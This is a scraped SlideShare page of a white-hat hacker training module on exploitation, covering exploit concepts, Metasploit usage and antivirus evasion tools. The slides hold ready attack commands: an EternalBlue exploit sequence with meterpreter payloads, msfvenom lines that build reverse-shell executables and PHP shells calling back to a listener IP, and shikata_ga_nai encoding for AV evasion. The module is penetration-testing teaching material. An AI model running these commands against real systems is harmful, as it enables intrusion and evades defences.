SlideShare a Scribd company logo

Practical White Hat Hacker Training - Exploitation

PRISMA CSI
PRISMA CSI

This presentation part of Prisma CSI's Practical White Hat Hacker Training v1 PRISMA CSI • Cyber Security and Intelligence www.prismacsi.com This document can be shared or used by quoted and used for commercial purposes, but can not be changed. Detailed information is available at https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.

Education
1 of 65
www.prismacsi.com © All Rights Reserved. 1 Practical White Hat Hacker Training #5 Exploitation This document may be quoted or shared, but cannot be modified or used for commercial purposes. For more information, visit https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr
www.prismacsi.com © All Rights Reserved. 2 Exploit Stage Topics • What is an exploit? • Types of exploits • Local, remote and 0day exploits • Exploit Databases • Example Exploit Scenarios • Exploit Execution and Usage Scenarios • Exploit Frameworks • Payload Concept • Metasploit Framework • Antivirus Evasion Software • Veil-Evasion • Shellter • Application
www.prismacsi.com © All Rights Reserved. 3 Basic Concepts • What’s an exploit? • The name given to tools developed to exploit a vulnerability. • Also called exploitation code. • Local Exploit • Remote Exploit • Web Exploit • DoS Exploit • 0day Exploit • What’s a Payload? • A piece of malicious code that performs a given desired action after an exploit
www.prismacsi.com © All Rights Reserved. 4 Exploit Databases • A holding container for a massive number of exploits. Discovered/detected software and service exploits can be searched for in these databases. • Exploit-db.com • Securityfocus.com • 0day.today • Exploits.shodan.io • Iedb.ir • Cxsecurity.com/exploit • Rapid7.com/db
www.prismacsi.com © All Rights Reserved. 5 Exploit Development Languages • In which programming languages are exploits generally written? • Python • C / C++ • Perl • PHP • Ruby • Why was the Framework concept conceived? • Metasploit Framework example
www.prismacsi.com © All Rights Reserved. 6 Exploit Execution / Use– Demo
www.prismacsi.com © All Rights Reserved. 7 Exploit Editing • Exploits don’t execute on every system. • Parameters may vary according to features such as operating system, processor architecture, system language. • In this case you may need to edit the exploit and then execute it afterwards. • Replicas of target system can be created in a laboratory environment for experiments. • Assume you only have one chance to attack! • A system crash may be the end of everything.
www.prismacsi.com © All Rights Reserved. 8 Exploit Example - Scenario • Consider a bank’s credit calculation area! • Where is the calculation performed? ( Server? Client? ) • What if we perform the request specified in the scenario thousands of times within a minute? • This is an example of a simple DoS ExploitJ
www.prismacsi.com © All Rights Reserved. 9 Exploit Frameworks • Metasploit Community • Metasploit Pro • Core Impact • Exploithub • BeEF
www.prismacsi.com © All Rights Reserved. 10 Metasploit Framework • Metasploit Framework • Installation • Basic Commands • Auxiliary modules • Exploit use • Payload listi and Meterpreter use • Output analysis • Post Exploitation
www.prismacsi.com © All Rights Reserved. 11 Metasploit Framework • It’s an open source software. • Pro version is available but the community version will be sufficient for this course . • Exploits • Payloads • Auxiliary modules • Encoders • Post exploits
www.prismacsi.com © All Rights Reserved. 12 Metasploit Framework • Visit the link below for installation instructions: • https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers • Update: • msfupdate
www.prismacsi.com © All Rights Reserved. 13 Metasploit Framework
www.prismacsi.com © All Rights Reserved. 14 Metasploit Framework • Start • Begin by typing msfconsole in the command line. • You can check the database status with the following command: • db_status
www.prismacsi.com © All Rights Reserved. 15 Metasploit Framework • Workspace concept • Use the workspace to list all the available workspaces. • workspace -a prisma creates a prisma workspace. • workspace prisma Switch to prisma workspace. • workspace -d prisma delete the prisma workspace.
www.prismacsi.com © All Rights Reserved. 16 Metasploit Framework
www.prismacsi.com © All Rights Reserved. 17 Metasploit Framework • Working with Nessus, Nmap outputs You can use the output of scanning software in integration with metasploit. This is one of the best features of the Metasploit Framework. • db_import nmap.xml import nmap output. • db_import nessus-report.nessus import nessus output. • db_export -f xml /tmp/prisma.xml export the data in your workspace.
www.prismacsi.com © All Rights Reserved. 18 Metasploit Framework
www.prismacsi.com © All Rights Reserved. 19 Metasploit Framework
www.prismacsi.com © All Rights Reserved. 20 Metasploit Framework • Workspace data : • hosts • services • creds • loots
www.prismacsi.com © All Rights Reserved. 21 Metasploit Framework • Hosts command • Db_nmap –sS –Pn –n 10.0.1.0/24 You can perform nmap scans with the command. host command can be used to view all IP addresses discovered from the output of this command. • hosts –h You can access all the command functions with the above command • hosts –R Used to add addresses to the RHOST parameter.
www.prismacsi.com © All Rights Reserved. 22 Metasploit Framework
www.prismacsi.com © All Rights Reserved. 23 Metasploit Framework • Services command • db_nmap –sS –Pn –n 10.0.1.0/24 –sV Used to execute an nmap scan. After the output of this command, you can view the ports on all IP addresses and the services running on them with the services command. • services –h . You can access all the services command functions with the above command • services –p 445 • services –S http • services –p 80 -R
www.prismacsi.com © All Rights Reserved. 24 Metasploit Framework
www.prismacsi.com © All Rights Reserved. 25 Metasploit Basic Command List • help • Help command • banner • Allows you to take awesome screenshotsJ • info • Get information on any plugin • info exploit/windows/smb/psexec • search • Search command • search ms17-010
www.prismacsi.com © All Rights Reserved. 26 Metasploit Basic Command List • use • Select an exploit • use exploit/windows/smb/psexec • set • Exploit • info • Acquire information on any plugin • info exploit/windows/smb/psexec • search • Search command • search ms17-010
www.prismacsi.com © All Rights Reserved. 27 Metasploit Framework - Help
www.prismacsi.com © All Rights Reserved. 28 Metasploit Framework - Banner
www.prismacsi.com © All Rights Reserved. 29 Metasploit Framework - Info
www.prismacsi.com © All Rights Reserved. 30 Metasploit Basic Command List • set • Used to assign values to a parameter. • set RHOST 10.0.1.5 • setg • Used to assign a parameter value as global. • unset • Used to reset parameter values. • show • Show namesJ • use • Activates a plugin.
www.prismacsi.com © All Rights Reserved. 31 Metasploit Basic Command List • run and exploit • Used to run a plugin. • load and unload • Used to activate or deactivate a module. • exit • Exiting command
www.prismacsi.com © All Rights Reserved. 32 Metasploit Show Command • show payloads • List Payloads • show targets • List operating systems suitable for attacks with a given plugin • show options • Show setting parameters for a plugin • show encoders • List all encoders
www.prismacsi.com © All Rights Reserved. 33 Auxillary Modules and Use • show auxillary • search smb_login • use auxillary/dos/windows/rdp/ms12_020 • set RHOST • set RPORT • run
www.prismacsi.com © All Rights Reserved. 34 Exploit Attempt (MS17-010) • search netapi • info exploit/windows/smb/ms17_010_eternalblue • use exploit/windows/smb/ms17_010_eternalblue • show options • set payload windows/meterpreter/bind_tcp • set LHOST, • set RHOST • set RPORT • exploit
www.prismacsi.com © All Rights Reserved. 35 Payload Examples • set PAYLOAD windows/meterpreter/reverse_http • set PAYLOAD windows/shell/bind_tcp • set PAYLOAD linux/x86/meterpreter/reverse_https • set PAYLOAD php/meterpreter/bind_tcp • set PAYLOAD java/meterpreter/bind_tcp • set PAYLOAD /windows/vncinject/reverse_tcp
www.prismacsi.com © All Rights Reserved. 36 Reverse/Bind Shell
www.prismacsi.com © All Rights Reserved. 37 Session Management • exploit/multi/handler • Can be used as a listener. • Listener can be run as a job to get connections from multiple targets. • jobs : • exploit –j • jobs command is used for listing jobs.
www.prismacsi.com © All Rights Reserved. 38 Session Management • You can manage all sessions obtained with the sessions command. • sessions –l : list sessions • session –i 1 : 1. Interact with session • sessions –K : end all sessions • sessions –u : upgrade a session to meterpreter session • kill : used to kill a session. • background : takes the session into the background and returns to the metasploit console.
www.prismacsi.com © All Rights Reserved. 39 Exploit Search • Searchsploit
www.prismacsi.com © All Rights Reserved. 40 What’s Msfvenom? • There may be no direct vulnerability in the target system. • In this case, it may be necessary to try to penetrate the system in different ways. • For example if a created malicious .exe file is somehow successfully uploaded and executed on a system then the system can be captured. • Or you might want to upload a malicious shell written in php on to a web application with a file upload vulnerability and get a terminal connection on metasploit. • That's where msfvenom comes into play!
www.prismacsi.com © All Rights Reserved. 41 Msfvenom Use • Msfvenom basic commands • msfvenom -h • msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337-f exe > shell.exe • msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.10.10. lport=4444 -f raw > exp.php • msfvenom - p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=4444 -f war -a x86
www.prismacsi.com © All Rights Reserved. 42 Msfvenom AV Evasion- Demonstration • msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337 -e x86/shikata_ga_nai -i 15 -f exe -o shell.exe
www.prismacsi.com © All Rights Reserved. 43 Msfvenom Help
www.prismacsi.com © All Rights Reserved. 44 Msfvenom PHP Payload Contents
www.prismacsi.com © All Rights Reserved. 45 Download Metasploit Additional Plugins • https://github.com/darkoperator/Metasploit-Plugins
www.prismacsi.com © All Rights Reserved. 46 Loading Metasploit Features • Files are added manually under ~/.msf4/plugin/
www.prismacsi.com © All Rights Reserved. 47 Armitage Use • Metasploit Framework GUI • Used to perform actions quickly • The interface is a little easier to use compared to the console application
www.prismacsi.com © All Rights Reserved. 48 Armitage Use • Adding a host
www.prismacsi.com © All Rights Reserved. 49 Armitage Use • Host scanning
www.prismacsi.com © All Rights Reserved. 50 Armitage Use • Scan Results
www.prismacsi.com © All Rights Reserved. 51 Armitage Use • Finding an attack vector
www.prismacsi.com © All Rights Reserved. 52 Armitage Use • Java_rmi_attack
www.prismacsi.com © All Rights Reserved. 53 Armitage Use • Java_rmi_attack • Meterpreter session
www.prismacsi.com © All Rights Reserved. 54 Antivirus Evasion Tools • An antivirus mechanism may be found in target systems. • In this case the attacks should be performed with much more caution. • There are tools developed to bypass antiviruses. • Used tools • Veil-Evasion • Shellter • Av0id • Msfvenom
www.prismacsi.com © All Rights Reserved. 55 Veil-Evasion Installation
www.prismacsi.com © All Rights Reserved. 56 Veil-Evasion Payload Selection
www.prismacsi.com © All Rights Reserved. 57 Veil-Evasion Payload Configuration
www.prismacsi.com © All Rights Reserved. 58 Veil-Evasion Payload Creation - DEMO
www.prismacsi.com © All Rights Reserved. 59 Virustotal Scanning
www.prismacsi.com © All Rights Reserved. 60 Shellter Installation
www.prismacsi.com © All Rights Reserved. 61 Shellter Use – DEMO
www.prismacsi.com © All Rights Reserved. 62 Virustotal Scanning
www.prismacsi.com © All Rights Reserved. 63 Applications
www.prismacsi.com © All Rights Reserved. 64 Questions?
www.prismacsi.com © All Rights Reserved. 65 www.prismacsi.com info@prismacsi.com 0 850 303 85 35 /prismacsi Contacts

Recommended

Practical White Hat Hacker Training - Vulnerability Detection
Practical White Hat Hacker Training - Vulnerability DetectionPractical White Hat Hacker Training - Vulnerability Detection
Practical White Hat Hacker Training - Vulnerability DetectionPRISMA CSI
 
Practical White Hat Hacker Training - Active Information Gathering
Practical White Hat Hacker Training - Active Information GatheringPractical White Hat Hacker Training - Active Information Gathering
Practical White Hat Hacker Training - Active Information GatheringPRISMA CSI
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPRISMA CSI
 
Practical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPractical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPRISMA CSI
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
Web security for developers
Web security for developersWeb security for developers
Web security for developersSunny Neo
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101dc612
 
Coporate Espionage
Coporate EspionageCoporate Espionage
Coporate EspionageUTD Computer Security Group
 

Recommended

Practical White Hat Hacker Training - Vulnerability Detection
Practical White Hat Hacker Training - Vulnerability DetectionPractical White Hat Hacker Training - Vulnerability Detection
Practical White Hat Hacker Training - Vulnerability DetectionPRISMA CSI
 
Practical White Hat Hacker Training - Active Information Gathering
Practical White Hat Hacker Training - Active Information GatheringPractical White Hat Hacker Training - Active Information Gathering
Practical White Hat Hacker Training - Active Information GatheringPRISMA CSI
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPRISMA CSI
 
Practical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPractical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPRISMA CSI
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
Web security for developers
Web security for developersWeb security for developers
Web security for developersSunny Neo
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101dc612
 
Coporate Espionage
Coporate EspionageCoporate Espionage
Coporate EspionageUTD Computer Security Group
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsAPNIC
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...B.A.
 
Csw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelistingCsw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelistingCanSecWest
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the KingdomDennis Maldonado
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0marcioalma
 
ModSecurity and NGINX: Tuning the OWASP Core Rule Set
ModSecurity and NGINX: Tuning the OWASP Core Rule SetModSecurity and NGINX: Tuning the OWASP Core Rule Set
ModSecurity and NGINX: Tuning the OWASP Core Rule SetNGINX, Inc.
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X WayStephan Borosh
 
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...EC-Council
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guysNick Landers
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCanSecWest
 
Security events in 2014
Security events in 2014Security events in 2014
Security events in 2014Chong-Kuan Chen
 
ModSecurity and NGINX: Tuning the OWASP Core Rule Set - EMEA
ModSecurity and NGINX: Tuning the OWASP Core Rule Set - EMEAModSecurity and NGINX: Tuning the OWASP Core Rule Set - EMEA
ModSecurity and NGINX: Tuning the OWASP Core Rule Set - EMEANGINX, Inc.
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud HackNotSoSecure Global Services
 
1000 to 0
1000 to 01000 to 0
1000 to 0Sunny Neo
 
Ch 6: Attacking Authentication
Ch 6: Attacking AuthenticationCh 6: Attacking Authentication
Ch 6: Attacking AuthenticationSam Bowne
 
Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17Brandon Arvanaghi
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Xavier Ashe
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For BeginnersRamnath Shenoy
 
Open Source Cyber Weaponry
Open Source Cyber WeaponryOpen Source Cyber Weaponry
Open Source Cyber WeaponryJoshua L. Davis
 

More Related Content

What's hot

Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsAPNIC
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...B.A.
 
Csw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelistingCsw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelistingCanSecWest
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the KingdomDennis Maldonado
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0marcioalma
 
ModSecurity and NGINX: Tuning the OWASP Core Rule Set
ModSecurity and NGINX: Tuning the OWASP Core Rule SetModSecurity and NGINX: Tuning the OWASP Core Rule Set
ModSecurity and NGINX: Tuning the OWASP Core Rule SetNGINX, Inc.
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X WayStephan Borosh
 
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...EC-Council
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guysNick Landers
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCanSecWest
 
ModSecurity and NGINX: Tuning the OWASP Core Rule Set - EMEA
ModSecurity and NGINX: Tuning the OWASP Core Rule Set - EMEAModSecurity and NGINX: Tuning the OWASP Core Rule Set - EMEA
ModSecurity and NGINX: Tuning the OWASP Core Rule Set - EMEANGINX, Inc.
 
Ch 6: Attacking Authentication
Ch 6: Attacking AuthenticationCh 6: Attacking Authentication
Ch 6: Attacking AuthenticationSam Bowne
 
Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17Brandon Arvanaghi
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Xavier Ashe
 

What's hot (20)

Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my Honeypots
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...
 
Csw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelistingCsw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelisting
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
 
ModSecurity and NGINX: Tuning the OWASP Core Rule Set
ModSecurity and NGINX: Tuning the OWASP Core Rule SetModSecurity and NGINX: Tuning the OWASP Core Rule Set
ModSecurity and NGINX: Tuning the OWASP Core Rule Set
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
 
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
 
Security events in 2014
Security events in 2014Security events in 2014
Security events in 2014
 
ModSecurity and NGINX: Tuning the OWASP Core Rule Set - EMEA
ModSecurity and NGINX: Tuning the OWASP Core Rule Set - EMEAModSecurity and NGINX: Tuning the OWASP Core Rule Set - EMEA
ModSecurity and NGINX: Tuning the OWASP Core Rule Set - EMEA
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
 
1000 to 0
1000 to 01000 to 0
1000 to 0
 
Ch 6: Attacking Authentication
Ch 6: Attacking AuthenticationCh 6: Attacking Authentication
Ch 6: Attacking Authentication
 
Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016
 

Similar to Practical White Hat Hacker Training - Exploitation

Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For BeginnersRamnath Shenoy
 
Open Source Cyber Weaponry
Open Source Cyber WeaponryOpen Source Cyber Weaponry
Open Source Cyber WeaponryJoshua L. Davis
 
Owning computers without shell access dark
Owning computers without shell access darkOwning computers without shell access dark
Owning computers without shell access darkRoyce Davis
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)ClubHack
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introductionMostafa Abdel-sallam
 
Common Pitfalls of Functional Programming and How to Avoid Them: A Mobile Gam...
Common Pitfalls of Functional Programming and How to Avoid Them: A Mobile Gam...Common Pitfalls of Functional Programming and How to Avoid Them: A Mobile Gam...
Common Pitfalls of Functional Programming and How to Avoid Them: A Mobile Gam...gree_tech
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerShellmates
 
Metasploit Computer security testing tool
Metasploit Computer security testing toolMetasploit Computer security testing tool
Metasploit Computer security testing toolmedoelkang600
 
Your Inner Sysadmin - MidwestPHP 2015
Your Inner Sysadmin - MidwestPHP 2015Your Inner Sysadmin - MidwestPHP 2015
Your Inner Sysadmin - MidwestPHP 2015Chris Tankersley
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit frameworkLe Quyen
 
White Lightning Sept 2014
White Lightning Sept 2014White Lightning Sept 2014
White Lightning Sept 2014Bryce Kunz
 
Tool Up Your LAMP Stack
Tool Up Your LAMP StackTool Up Your LAMP Stack
Tool Up Your LAMP StackLorna Mitchell
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploitdevilback
 
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit FrameworkUnmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Frameworkegypt
 

Similar to Practical White Hat Hacker Training - Exploitation (20)

Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
 
Open Source Cyber Weaponry
Open Source Cyber WeaponryOpen Source Cyber Weaponry
Open Source Cyber Weaponry
 
Owning computers without shell access dark
Owning computers without shell access darkOwning computers without shell access dark
Owning computers without shell access dark
 
Metasploit
MetasploitMetasploit
Metasploit
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introduction
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
 
Common Pitfalls of Functional Programming and How to Avoid Them: A Mobile Gam...
Common Pitfalls of Functional Programming and How to Avoid Them: A Mobile Gam...Common Pitfalls of Functional Programming and How to Avoid Them: A Mobile Gam...
Common Pitfalls of Functional Programming and How to Avoid Them: A Mobile Gam...
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama Elhamer
 
Metasploit Computer security testing tool
Metasploit Computer security testing toolMetasploit Computer security testing tool
Metasploit Computer security testing tool
 
Your Inner Sysadmin - MidwestPHP 2015
Your Inner Sysadmin - MidwestPHP 2015Your Inner Sysadmin - MidwestPHP 2015
Your Inner Sysadmin - MidwestPHP 2015
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
 
White Lightning Sept 2014
White Lightning Sept 2014White Lightning Sept 2014
White Lightning Sept 2014
 
Tool up your lamp stack
Tool up your lamp stackTool up your lamp stack
Tool up your lamp stack
 
Tool Up Your LAMP Stack
Tool Up Your LAMP StackTool Up Your LAMP Stack
Tool Up Your LAMP Stack
 
Breach and attack simulation tools
Breach and attack simulation toolsBreach and attack simulation tools
Breach and attack simulation tools
 
iCrOSS 2013_Pentest
iCrOSS 2013_PentestiCrOSS 2013_Pentest
iCrOSS 2013_Pentest
 
PROCESS WARP
PROCESS WARPPROCESS WARP
PROCESS WARP
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
 
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit FrameworkUnmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
 

More from PRISMA CSI

Sysmon ile Log Toplama
Sysmon ile Log ToplamaSysmon ile Log Toplama
Sysmon ile Log ToplamaPRISMA CSI
 
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)Practical White Hat Hacker Training - Passive Information Gathering(OSINT)
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)PRISMA CSI
 
Beyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma Saldırıları
Beyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma SaldırılarıBeyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma Saldırıları
Beyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma SaldırılarıPRISMA CSI
 
Sızma Testi Metodolojileri
Sızma Testi MetodolojileriSızma Testi Metodolojileri
Sızma Testi MetodolojileriPRISMA CSI
 
Sızma (Penetrasyon) Testi Nedir?
Sızma (Penetrasyon) Testi Nedir?Sızma (Penetrasyon) Testi Nedir?
Sızma (Penetrasyon) Testi Nedir?PRISMA CSI
 
Beyaz Şapkalı Hacker CEH Eğitimi - Post Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Post Exploit AşamasıBeyaz Şapkalı Hacker CEH Eğitimi - Post Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Post Exploit AşamasıPRISMA CSI
 
Beyaz Şapkalı Hacker CEH Eğitimi - Zafiyet Keşfi
Beyaz Şapkalı Hacker CEH Eğitimi - Zafiyet KeşfiBeyaz Şapkalı Hacker CEH Eğitimi - Zafiyet Keşfi
Beyaz Şapkalı Hacker CEH Eğitimi - Zafiyet KeşfiPRISMA CSI
 
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit AşamasıBeyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
